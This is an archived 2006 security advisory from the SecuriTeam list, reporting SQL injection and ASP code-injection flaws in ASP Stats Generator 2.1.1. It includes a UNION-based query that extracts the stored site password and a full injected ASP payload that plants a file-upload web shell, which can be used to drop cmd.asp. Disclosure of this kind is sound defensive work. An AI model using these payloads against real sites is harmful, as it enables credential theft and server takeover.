The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[NT] ASP Stats Generator Multiple Vulnerabilities (SQL Injection, Code Execution)


<< Previous INDEX Search src / Print Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 2 Jul 2006 16:09:46 +0200
Subject: [NT] ASP Stats Generator Multiple Vulnerabilities (SQL Injection, Code Execution)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060702140936.8DF595805@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  ASP Stats Generator Multiple Vulnerabilities (SQL Injection, Code 
Execution)
------------------------------------------------------------------------


SUMMARY

" <http://www.weppos.com/asg/en/default.asp>; ASP Stats Generator is a 
powerful website counter, completely written in ASP programming language."

Improper filtering of user input allows attackers to execute arbitrary 
code and SQL queries.

DETAILS

Vulnerable Systems:
 * ASP Stats Generator 2.1.1 and prior

Immune Systems:
 * ASP Stats Generator version 2.1.2

SQL Injection:
The following URL can be used to trigger an SQL injection vulnerability in 
the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression
'SUM(Visits) ''.
/myasg/pages.asp, line 236

Proof of Concept:
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from 
tblst_config&mese=1

ASP Code Injection:
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" 
 isn't properly sanitized before being stored in the "inc_skin_file.asp".

This can be exploited to inject arbitrary ASP code.

<B>Proof of Concept:</B>
#F9F9F9" : dim path,hstr, mpath, content, filename: 
mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content 
= request("content"): filename = request("filename"): on error resume 
next: Dim objFSO,f: Set objFSO = Server.CreateObject 
("Scripting.FileSystemObject"): if not filename = "" then: response.Write( 
"Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = 
filename: end if: if not content="" then: response.Write( "Contented.<BR>" 
): set f = objFSO.CreateTextFile( path ): response.Write( err.Description 
& "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" 
): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") 
%><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" 
ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload 
File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" 
rows="15" cols="46" ><%=content%></TEXTAREA></TD></TR><TR><TD><P 
align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" 
name="filename" value="<%=filename%>" ></P><P align="center"><INPUT 
type="submit" value="Upload" ID="Submit1" 
NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error 
goto 0: hstr = "
[m.r.roohian]
attacker can upload  "cmd.asp" with this uploader and ...


ADDITIONAL INFORMATION

The information has been provided by  <mailto:het_ebadi@yahoo.com.> Hamid 
Ebadi.
The original article can be found at:  
<http://www.hamid.ir/security/aspstats.txt>; 
http://www.hamid.ir/security/aspstats.txt




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру